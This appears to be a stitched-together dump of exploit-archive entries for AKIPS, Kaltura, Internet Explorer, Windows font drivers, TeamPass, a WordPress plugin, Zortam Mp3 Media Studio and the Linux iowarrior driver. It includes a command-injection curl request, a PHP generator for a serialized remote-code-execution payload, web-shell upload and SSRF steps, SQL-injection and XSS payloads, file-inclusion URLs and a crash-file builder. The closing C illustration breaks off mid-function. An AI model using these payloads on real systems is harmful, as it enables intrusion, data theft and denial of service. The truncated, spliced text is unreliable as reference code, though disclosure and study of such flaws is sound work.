curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"



example response: 

<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>


3. Solution:
Update to version 16.6
https://www.akips.com/showdoc/download


4. Timeline:

* 03-14-2016: Discovered, Vendor Notified, Vendor Response
* 03-15-2016: Vendor Releases Remediated Build 16.6
            
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Kaltura Community Edition Multiple Vulnerabilities
Affected versions: Kaltura Community Edition <=11.1.0-2

PDF:
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf

+-----------+
|Description|
+-----------+
The Kaltura platform contains a number of vulnerabilities, allowing
unauthenticated users to execute code, read files, and access services
listening on the localhost interface. Vulnerabilities present in the
application also allow authenticated users to execute code by uploading
a file, and perform stored cross site scripting attacks from the Kaltura
Management Console into the admin console. Weak cryptographic secret
generation allows unauthenticated users to bruteforce password reset
tokens for accounts, and allows low level users to perform privilege
escalation attacks.

+------------+
|Exploitation|
+------------+
==Unserialize Code Execution==
The following PHP POC will generate an object that leads to code
execution when posted to an endpoint present on the server.
Authentication is not required.
[POC]
<?php
$init = "system('id;uname -a')";
$cmd = $init.".die()";
$len = strlen($cmd);
$obj="a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:$len:\"$cmd\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}";
$sploit = base64_encode($obj);
echo $sploit;
?>
------------

The Base64 encoded object generated above should be included in the
kdata section of the following curl request:

$ curl http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit]

==Arbitrary File Upload==
Users authenticated to the KMC with appropriate privileges can upload
arbitrary files through the "Upload Content" functionality. This can be
used to upload a PHP web shell as an image file and gain command
execution. In order to execute the code, the on-disk path of the uploaded
file must be obtained and then browsed to directly. Obtaining the
uploaded file's path can be achieved with the following command.
[POC]
$ curl "http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx" -b "[Valid Cookie]"

Directly accessing the path "url" returned by the above request will
result in the execution of the uploaded PHP script.

$ curl http://[HOST]/[URL PATH]

==SSRF / File Read (Limited)==
A limited number of files on the host can be read by passing a "file://"
protocol handler to a CURL call.
[POC]
$ curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini

Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The
following POC uses the SSRF issue to send a command and retrieve
statistics from memcached listening on localhost, which is present in a
default Kaltura install.
[POC]
$ curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211 -m 2 --data $'b=set nl 0 60 4\n\n\n\n\n'
$ curl http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211 --data "c=get nl&d=stats&e=quit"

+----------+
| Solution |
+----------+
Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the
majority of these issues. No fixes are available for some of the issues
disclosed, so carefully firewalling off the Kaltura interface is
recommended.

+------------+
| Additional |
+------------+
A disclosure timeline, further information and additional less critical
vulnerabilities are available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
            
<!--

Source: https://code.google.com/p/google-security-research/issues/detail?id=677

Minimized PoC:

-->

<style type="text/css">
*:before {
  content:counter(counter-0) close-quote url(?);
  column-count:1;
  position:fixed;
}
</style>

<!--

Backtrace for reference:

2:051:x86> k
ChildEBP RetAddr
0c2c9688 60ca029e MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x6f2093
0c2c974c 60c9fe17 MSHTML!Layout::PageCollection::FormatPage+0x167
0c2c9854 60caad7e MSHTML!Layout::PageCollection::LayoutPagesCore+0x2c3
0c2c9880 60caac9f MSHTML!Layout::PageCollection::LayoutPages+0xca
0c2c9938 60caa49c MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x3b8
0c2c99c0 61295d6e MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xec
0c2c9a04 60c8c52f MSHTML!CView::EnsureSize+0x224
0c2c9a5c 610977ce MSHTML!CView::EnsureView+0x3a5
0c2c9b10 60dd92ab MSHTML!CDoc::RunningToInPlace+0x1b4
0c2c9b30 60dfaabe MSHTML!CServer::TransitionTo+0x50
0c2c9b48 62118e72 MSHTML!CServer::Show+0x50
0c2c9b68 62118d61 IEFRAME!CDocObjectHost::_ShowMsoView+0xd8
0c2c9b84 6109585d IEFRAME!CDocObjectHost::ActivateMe+0x31
0c2c9ba8 610957d1 MSHTML!CServer::ActivateView+0x81
0c2c9bd8 6109577b MSHTML!CServer::DoUIActivate+0x21
0c2c9c0c 60df9e59 MSHTML!CServer::DoVerb+0x77
0c2c9c4c 60df9e0e MSHTML!CMarkup::Navigate+0x3b
0c2c9c5c 62118f52 MSHTML!CDoc::Navigate+0x1e
0c2c9ca0 62273041 IEFRAME!CDocObjectHost::_ActivateMsoView+0x8f
0c2c9cc0 620b51c0 IEFRAME!CDocObjectHost::UIActivate+0x4c
0c2c9cd8 62272f7d IEFRAME!CDocObjectView::UIActivate+0x20
0c2c9d04 620dc130 IEFRAME!CBaseBrowser2::_UIActivateView+0xa5
0c2cbdd0 620e464c IEFRAME!CBaseBrowser2::v_ActivatePendingView+0x200
0c2cbdf0 620e01a4 IEFRAME!CShellBrowser2::v_ActivatePendingView+0x2c
0c2cbe0c 620e00c9 IEFRAME!CBaseBrowser2::_ExecShellDocView+0xcb
0c2cbe40 6209bf4c IEFRAME!CBaseBrowser2::Exec+0x20c
0c2cc0d0 620dafd5 IEFRAME!CShellBrowser2::Exec+0xdd
0c2cc108 620d9a4b IEFRAME!CDocObjectHost::_Navigate+0x50
0c2cc338 620da7f2 IEFRAME!CDocObjectHost::_OnReadyState+0x13c
0c2cc398 620da728 IEFRAME!CDocObjectHost::_OnChangedReadyState+0xc6
0c2cc3a0 60d9c704 IEFRAME!CDocObjectHost::OnChanged+0x1b
0c2cc3f0 60d82967 MSHTML!CBase::FirePropertyNotify+0x106
0c2cc414 60d8869c MSHTML!CMarkup::SetReadyState+0x85
0c2cc5b8 60d8d5ee MSHTML!CMarkup::SetInteractiveInternal+0x2bc
0c2cc5ec 60d8de5e MSHTML!CMarkup::RequestReadystateInteractive+0x92
0c2cc618 60d7cfea MSHTML!CMarkup::BlockScriptExecutionHelper+0xf7
0c2cc74c 60d83a78 MSHTML!CHtmPost::Exec+0xa1c
0c2cc76c 60d839de MSHTML!CHtmPost::Run+0x3d
0c2cc78c 60d8c2c3 MSHTML!PostManExecute+0x61
0c2cc7a0 60d8d0f8 MSHTML!PostManResume+0x7b
0c2cc7d0 60d4a45d MSHTML!CHtmPost::OnDwnChanCallback+0x38
0c2cc7e8 60c6d55b MSHTML!CDwnChan::OnMethodCall+0x2f
0c2cc830 60c6cc72 MSHTML!GlobalWndOnMethodCall+0x17b
0c2cc884 757d8e71 MSHTML!GlobalWndProc+0x103
0c2cc8b0 757d90d1 user32!_InternalCallWinProc+0x2b
0c2cc944 757da62a user32!UserCallWinProcCheckWow+0x18e
0c2cc9b8 757da680 user32!DispatchMessageWorker+0x473
0c2cc9c4 6207a77c user32!DispatchMessageW+0x10
0c2cfb94 620edf88 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
0c2cfc54 7201ebec IEFRAME!LCIETab_ThreadProc+0x3e7
0c2cfc6c 67d73a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
0c2cfca4 67f99608 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
WARNING: Stack unwind information not available. Following frames may be wrong.
0c2cfce0 75a77c04 vfbasics+0x19608
0c2cfcf4 77a1ad5f KERNEL32!BaseThreadInitThunk+0x24
0c2cfd3c 77a1ad2a ntdll_779c0000!__RtlUserThreadStart+0x2f
0c2cfd4c 00000000 ntdll_779c0000!_RtlUserThreadStart+0x1b

-->
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=682

We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:

---
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: a6703535, Actual security check cookie from the stack
Arg2: 98ee9e09, Expected security check cookie
Arg3: 671161f6, Complement of the expected security check cookie
Arg4: 00000000, zero

Debugging Details:
------------------


DEFAULT_BUCKET_ID:  VERIFIER_ENABLED_VISTA_MINIDUMP

SECURITY_COOKIE:  Expected 98ee9e09 found a6703535

CUSTOMER_CRASH_COUNT:  1

BUGCHECK_STR:  0xF7

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 98ea5720 to 82725b84

STACK_TEXT:  
a6723488 98ea5720 000000f7 a6703535 98ee9e09 nt!KeBugCheckEx+0x1e
WARNING: Stack unwind information not available. Following frames may be wrong.
a67234a8 98ec57f6 00000085 00400000 08680370 ATMFD+0x15720
a672353c 98ec5b0e 00400000 a6723790 00400000 ATMFD+0x357f6
a6723610 8297ef90 ff68a000 00000000 ff68a000 ATMFD+0x35b0e
a6723624 99180853 3e9ca839 a6723734 98ec5063 nt!VerifierExFreePoolWithTag+0x30
a6723638 00400000 a672364c a6723790 a6723868 win32k!VerifierEngFreeMem+0x5b
a6723790 98e95328 98e953b4 98e953be 98e95442 0x400000
a67237c8 00000000 00001f98 00000000 00000000 ATMFD+0x5328
---

While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.

The immediate reason for the bugcheck is a stack corruption detected by the stack cookie protection (/GS). The issue reproduces on Windows 7 and 8.1; other platforms were not tested. In our environment, it is sufficient to open the offending font in the default Windows Font Viewer to reproduce the crash, or even to click on a folder icon containing the font in Windows Explorer.

Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39561.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=683

We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:

---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fb6f5000, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 99053e40, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


Could not read faulting driver name

WRITE_ADDRESS: GetPointerFromAddress: unable to read from 827ae84c
Unable to read MiSystemVaType memory at 8278d780
 fb6f5000 

FAULTING_IP: 
ATMFD+33e40
99053e40 890c82          mov     dword ptr [edx+eax*4],ecx

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  VERIFIER_ENABLED_VISTA_MINIDUMP

BUGCHECK_STR:  0xD6

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 99054677 to 99053e40

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
b603ecb0 99054677 fb472880 fb6f438c 00000f5c ATMFD+0x33e40
b603ece4 99054776 fb6f4380 00000003 fb6f438c ATMFD+0x34677
b603ed0c 99049fb3 fb472800 fc5b60b8 990663ec ATMFD+0x34776
b603ed30 9904eaf5 fc704c70 990663ec 00000f5c ATMFD+0x29fb3
b603f444 9904f85f fc704c70 9905f028 b603f690 ATMFD+0x2eaf5
b603f500 9904286e fc704c70 9905f028 b603f690 ATMFD+0x2f85f
b603f5ec 99042918 fc704c70 b603f690 b603f714 ATMFD+0x2286e
b603f618 990333d2 fc704c70 9905f028 b603f690 ATMFD+0x22918
b603f77c 990337a9 00000000 b603f89c fb6bcc80 ATMFD+0x133d2
b603f7d0 990240ff 00000000 b603f89c 00000000 ATMFD+0x137a9
b603f824 9918de12 ff7a5010 fb562cf0 00000001 ATMFD+0x40ff
b603f86c 9917687d ff7a5010 fb562cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
b603f8e0 991a1653 ffa6a130 fb588b54 0000004c win32k!xInsertMetricsRFONTOBJ+0x9c
b603f914 991a3735 00000020 b603f9fc b603fb8c win32k!RFONTOBJ::bGetGlyphMetrics+0x131
b603fbb8 991b6856 17010459 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
b603fc14 8267fa06 17010459 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
b603fc14 776771b4 17010459 00000040 00000040 nt!KiSystemServicePostCall
02dde7ac 00000000 00000000 00000000 00000000 0x776771b4
---

The crash always occurs while trying to write outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "CFF " table.

The issue reproduces on Windows 7 and 8.1; other platforms were not tested. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in ATMFD.DLL or another location in kernel space, as caused by the corrupted pool state.

Attached is an archive with the proof-of-concept mutated OTF file, together with the original font used to generate it and a corresponding crash log from Windows 7 32-bit.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39560.zip
            
Affected Product:     TeamPass
Vulnerability Type:   Multiple XSS, CSRF, SQL injections
Fixed in Version:     2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)
Vendor Website:       http://www.teampass.net
Software Link:        https://github.com/nilsteampassnet/TeamPass
Affected Version:     2.1.24 and prior
Vulnerable software (including source): https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4
Google Dork:          intitle:"Teampass" + inurl:index.php?page=items
Tested on:            Ubuntu
Remote Exploitable:   Yes
Reported to vendor:   30 December 2015
Disclosed to public:  14 March 2016
Release mode:         Responsible Disclosure
CVE-2015-7562 TeamPass 2.1.24 Persistent XSS
CVE-2015-7563 TeamPass 2.1.24 CSRF
CVE-2015-7564 TeamPass 2.1.24 SQL Injection
Credits:              Vincent Malguy


Description :
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role. 
Copyright (c) 2009-2015, Nils Laumaillé

********************* CVE-2015-7562 TeamPass 2.1.24 Persistent XSS  *********************
When displaying the detail of an item (a password entry), the "label" value is displayed using the stripslashes() sanitization function. This function does not effectively prevent XSS.
POC of a persistent XSS : add an item with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='". strip_tags($str) ."'></a>";
This XSS will be triggered each time a user clicks on this item.
As items can be shared, a user can trick an admin into triggering this XSS.
Fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)

POC of a persistent XSS :
Add a new role with name : <script>alert("XSS");</script>
This XSS will be triggered in many admin pages.
Fix in commits 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)

********************* CVE-2015-7563 TeamPass 2.1.24 CSRF  *********************
The lack of an anti-CSRF token leads to a vulnerability where an attacker can trick an authenticated user into performing unwanted actions on their behalf:

<form action="http://<teampass host>/sources/main.queries.php" method="post">
  <select name="type">
    <option value="increase_session_time">will add 1 hour timeout to the user session</option>
  </select>
  <input type=submit>
</form>

Recommended fix: add an anti-CSRF token.

********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections   *********************
An SQL injection has been found in item.query.php in parameter id with type set to action_on_quick_icon.
Sqlmap output :
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1
---
Fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)


SQL injections have been found in view.query.php in the parameters order and direction with type set to connections_logs, errors_logs or access_logs.
Note that direction needs to be prefixed by ", " in order to be exploitable.
Sqlmap output for connections_logs:
---
Parameter: order (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC
---

---
Parameter: direction (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=errors_logs&order=date&direction=,  (SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
Fix in commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
            
# Exploit Title: Wordpress Site Import 1.0.1 | Local and Remote file inclusion
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/site-import.1.0.1.zip
# Version: 1.0.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
/wp-content/plugins/site-import/readme.txt
======================================
[PoC]
======================================
Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================
            
#-*- coding: utf-8 -*-
#
# Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS
# Date: 2016-03-12
# Author: INSECT.B
#   Facebook : https://www.facebook.com/B.INSECT00
#   GitHub : binsect00
#   Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.zortam.com
# Software Link: http://www.zortam.com/download.html
# Version: 20.15
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
#
# Detail..
#  1. Zortam Mp3 Media Studio is a program that edits the tags of sound files.
#  2. If a tag exceeds a certain length, the program crashes.
#  3. Make an mp3 file whose title tag is 3000 bytes long.
#  4. Open the program and browse to the directory containing the file.

# ID3v2.3 tag header: "ID3" magic, version 3.0, flags, 4-byte syncsafe size
id3Id = b'\x49\x44\x33'          # "ID3"
id3Version = b'\x03\x00'         # ID3v2.3.0
id3Flag = b'\x00'
id3Size = b'\x00\x00\x2F\x2D'    # declared tag size (syncsafe integer)
id3 = id3Id + id3Version + id3Flag + id3Size

# TIT2 (title) frame: 4-byte frame id, 4-byte size, 2-byte flags,
# then one text-encoding byte followed by the title text
frameId = b'\x54\x49\x54\x32'    # "TIT2"
frameSize = b'\x00\x00\x0B\xB9'  # 0xBB9 = 3001 bytes: encoding byte + 3000 bytes of text
frameFlag = b'\x00\x00'
textEncoding = b'\x00'           # ISO-8859-1
textInfo = b'A' * 3000           # oversized title that triggers the crash
frame = frameId + frameSize + frameFlag + textEncoding + textInfo

padding = b'\x00' * 1100

payload = id3 + frame + padding

# bytes literals are used so the file is written identically under Python 2 and 3
with open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3', 'wb') as f:
    f.write(payload)

'''
STATUS_STACK_BUFFER_OVERRUN encountered
(aa4.c08): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640
eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
kernel32!FormatMessageA+0x14031:
7619e109 cc              int     3
0:000> !exchain
0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)
0012f2b8: 41414141
Invalid exception stack at 41414141
'''
            
OS-S Security Advisory 2016-15
Linux iowarrior Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS - RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (iowarrior driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net//advisories/OSS-2016-15_iowarrior.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB 
device requiring the iowarrior driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x7c0
idProduct:	0x1500
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1

This is the configuration descriptor containing the malicious value for 
bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the 
system.

[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x0
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81	
bmAttribut:	0x3	
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1	
bmAttribut:	0x2	
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82	
bmAttribut:	0x1
wMaxPacketSize:	0x4
bInterval:	0xc

The iowarrior driver assumes that there will be at least one IN endpoint 
descriptor. If the interface descriptor contains a zero value for 
bNumEndpoints or no IN endpoint descriptor is provided, the driver tries to 
dereference a null pointer and the kernel crashes:

****
$ nm iowarrior.ko.debug | grep iowarrior_probe
00000000000012a0 t iowarrior_probe
$ addr2line -e iowarrior.ko.debug 0x13D4
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_64/include/uapi/linux/usb/ch9.h:605
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (include/uapi/linux/usb/ch9.h)
...
603 static inline int usb_endpoint_maxp(const struct usb_endpoint_descriptor *epd) /* used by iowarrior_probe */
604 {
605         return __le16_to_cpu(epd->wMaxPacketSize); /* Possible Nullpointer Dereference */
606 }
...
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/misc/iowarrior.c)
...
790         /* set up the endpoint information */
791         for (i = 0; i < iface_desc->desc.bNumEndpoints; ++i) {
792                 endpoint = &iface_desc->endpoint[i].desc;
793
794                 if (usb_endpoint_is_int_in(endpoint))
795                         dev->int_in_endpoint = endpoint; /* Nullpointer if never set */
796                 if (usb_endpoint_is_int_out(endpoint))
797                         /* this one will match for the IOWarrior56 only */
798                         dev->int_out_endpoint = endpoint;
799         }
800         /* we have to check the report_size often, so remember it in the endianness suitable for our machine */
801         dev->report_size = usb_endpoint_maxp(dev->int_in_endpoint); /* Nullpointer if never set */
802         if ((dev->interface->cur_altsetting->desc.bInterfaceNumber == 0) &&
803             (dev->product_id == USB_DEVICE_ID_CODEMERCS_IOW56))
804                 /* IOWarrior56 has wMaxPacketSize different from report size */
805                 dev->report_size = 7;
...
****
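As an added illustration (not code from the advisory or from the kernel tree), the endpoint scan quoted above is rebuilt with minimal stand-in descriptor structures, next to a guarded version of the report_size computation that rejects the interface with -ENODEV instead of passing a NULL endpoint to usb_endpoint_maxp(). The descriptor values are taken from the advisory's dump; the second case (three endpoints, none of them interrupt IN) is constructed to show the other path the text describes.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Minimal stand-ins for the kernel's USB descriptor types (constructed for this
 * example; only the fields the iowarrior probe logic touches are modelled). */
struct usb_endpoint_descriptor {
    uint8_t  bEndpointAddress;
    uint8_t  bmAttributes;
    uint16_t wMaxPacketSize;      /* already in host byte order here */
};

struct usb_interface_descriptor {
    uint8_t bNumEndpoints;        /* as kept by the USB core after parsing */
    const struct usb_endpoint_descriptor *endpoint;
};

#define USB_ENDPOINT_DIR_MASK      0x80
#define USB_DIR_IN                 0x80
#define USB_ENDPOINT_XFERTYPE_MASK 0x03
#define USB_ENDPOINT_XFER_INT      0x03

static int usb_endpoint_is_int_in(const struct usb_endpoint_descriptor *epd)
{
    return (epd->bEndpointAddress & USB_ENDPOINT_DIR_MASK) == USB_DIR_IN &&
           (epd->bmAttributes & USB_ENDPOINT_XFERTYPE_MASK) == USB_ENDPOINT_XFER_INT;
}

/* Same scan as lines 791-799 of the quoted iowarrior_probe(): the result is
 * NULL whenever the loop never runs (bNumEndpoints == 0) or no endpoint is an
 * interrupt IN endpoint. The quoted driver hands that NULL straight to
 * usb_endpoint_maxp(), which reads wMaxPacketSize at offset 4: the
 * "NULL pointer dereference at 0000000000000004" in the oops. */
static const struct usb_endpoint_descriptor *
find_int_in_endpoint(const struct usb_interface_descriptor *iface)
{
    const struct usb_endpoint_descriptor *int_in = NULL;
    for (unsigned i = 0; i < iface->bNumEndpoints; ++i)
        if (usb_endpoint_is_int_in(&iface->endpoint[i]))
            int_in = &iface->endpoint[i];
    return int_in;
}

/* Guarded report_size computation (illustrative, not the kernel's patch): a
 * device without an interrupt IN endpoint is rejected with -ENODEV. */
static int iowarrior_report_size(const struct usb_interface_descriptor *iface)
{
    const struct usb_endpoint_descriptor *int_in = find_int_in_endpoint(iface);
    if (!int_in)
        return -ENODEV;
    return int_in->wMaxPacketSize;
}

/* Endpoints from the advisory's descriptor dump: interrupt IN 0x81
 * (wMaxPacketSize 0x404), bulk OUT 0x01, isochronous IN 0x82. */
static const struct usb_endpoint_descriptor advisory_endpoints[3] = {
    { 0x81, 0x03, 0x404 },
    { 0x01, 0x02, 0x004 },
    { 0x82, 0x01, 0x004 },
};

/* Case 1: the fuzzed interface descriptor declares bNumEndpoints = 0, so the
 * USB core keeps none of the three endpoints and the scan never runs. */
static const struct usb_interface_descriptor fuzzed_iface = { 0, advisory_endpoints };

/* Case 2 (constructed): three endpoints, but the IN endpoint is bulk, not interrupt. */
static const struct usb_endpoint_descriptor no_int_in_endpoints[3] = {
    { 0x81, 0x02, 0x404 },
    { 0x01, 0x02, 0x004 },
    { 0x82, 0x01, 0x004 },
};
static const struct usb_interface_descriptor no_int_in_iface = { 3, no_int_in_endpoints };

/* Case 3: the same endpoints with a consistent count, as a sane device presents them. */
static const struct usb_interface_descriptor sane_iface = { 3, advisory_endpoints };

int main(void)
{
    const struct usb_interface_descriptor *cases[] = { &fuzzed_iface, &no_int_in_iface, &sane_iface };
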